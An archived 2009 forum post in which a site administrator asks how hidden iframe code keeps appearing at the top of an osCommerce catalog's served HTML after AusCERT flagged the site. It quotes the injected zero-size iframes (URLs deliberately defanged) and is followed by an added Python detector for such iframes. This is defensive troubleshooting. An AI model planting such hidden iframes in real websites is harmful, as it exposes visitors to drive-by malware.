fengshui37
Posted January 26, 2009

Still haven't found a solution (or gotten an answer on how the iframe coding is being inserted into the "page source" at the OS-C catalog site)... The topic "Iframe Trojan Present" has dropped several pages down the queue and responses stopped, so I'm re-initiating it... Thanks...

My client was recently informed by AusCERT that her website was hosting malicious content... specifically iframes that pointed to links as follows (here and below, I have masked and incorrectly formatted them so these are NOT the exact links):

>> hxxp://msn-analytics. net/count.php?o=2
>> hxxp://pinoc. org/count.php?o=2
>> hxxp://wsxhost. net/count.php?o=2

were being inserted into the html coding for many pages.

I believe we fixed the problem that allowed it to get in there in the first place and, with hours of work, removed all instances of the code and finally removed a couple of php scripts that had been installed on the server which we believe were allowing the unwanted access.

The only problem is that the iframe code is STILL present in the source code for the catalog site (oscommerce). I downloaded EVERY single file associated with the catalog site and searched it for instances of "pinoc" and "wsxhost" and also decimal, hexadecimal, and binary ASCII representations of those letters and found no instances of it in the oscommerce files, BUT it is still showing up in the source code. The code is inserted in the very first line of the source, i.e.:

<iframe src="hxxp://msn-analytics. net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="hxxp://pinoc. org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="hxxp://wsxhost. net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="hxxp://msn-analytics. net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="LTR" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">............

Thanks,
- Fengshui37
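A check run against the HTML as served rather than the files on disk, as an added example that is not part of the original post: it flags zero-size or hidden iframes and records whether each one appears before the doctype, the pattern described above. The function names, the allow-list parameter and the sample page with its example.invalid host are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class HiddenIframeFinder(HTMLParser):
    """Collects zero-size or hidden iframes and notes whether each precedes the doctype."""

    def __init__(self):
        super().__init__()
        self.seen_doctype = False
        self.findings = []

    def handle_decl(self, decl):
        if decl.lower().startswith("doctype"):
            self.seen_doctype = True

    def handle_starttag(self, tag, attrs):
        if tag == "html":
            self.seen_doctype = True  # a page without a doctype still starts here
        if tag != "iframe":
            return
        a = {k: (v or "").strip().lower() for k, v in attrs}
        zero = a.get("width") in ("0", "0px") and a.get("height") in ("0", "0px")
        style = a.get("style", "").replace(" ", "")
        hidden = "hidden" in style or "display:none" in style
        if zero or hidden:
            src = dict(attrs).get("src") or ""
            self.findings.append({"host": urlparse(src).hostname or "",
                                  "src": src,
                                  "before_doctype": not self.seen_doctype})


def find_hidden_iframes(html, allowed_hosts=()):
    """Return findings for served HTML, skipping hosts the site owner embeds on purpose."""
    parser = HiddenIframeFinder()
    parser.feed(html)
    parser.close()
    return [f for f in parser.findings if f["host"] not in allowed_hosts]


# Constructed sample of a served page: one injected frame, one legitimate embed.
SAMPLE = ('<iframe src="http://tracker.example.invalid/count.php?o=2" width=0 height=0 '
          'style="hidden" frameborder=0 scrolling=no></iframe>'
          '<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">'
          '<html><head><title>Catalog</title></head><body>'
          '<iframe src="http://maps.example.com/embed" width=400 height=300></iframe>'
          '</body></html>')

if __name__ == "__main__":
    for finding in find_hidden_iframes(SAMPLE):
        print(finding)
```

Feeding it the response body saved from the live site shows what visitors actually receive, which can differ from what a search of the downloaded files finds.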
Archived
This topic is now archived and is closed to further replies.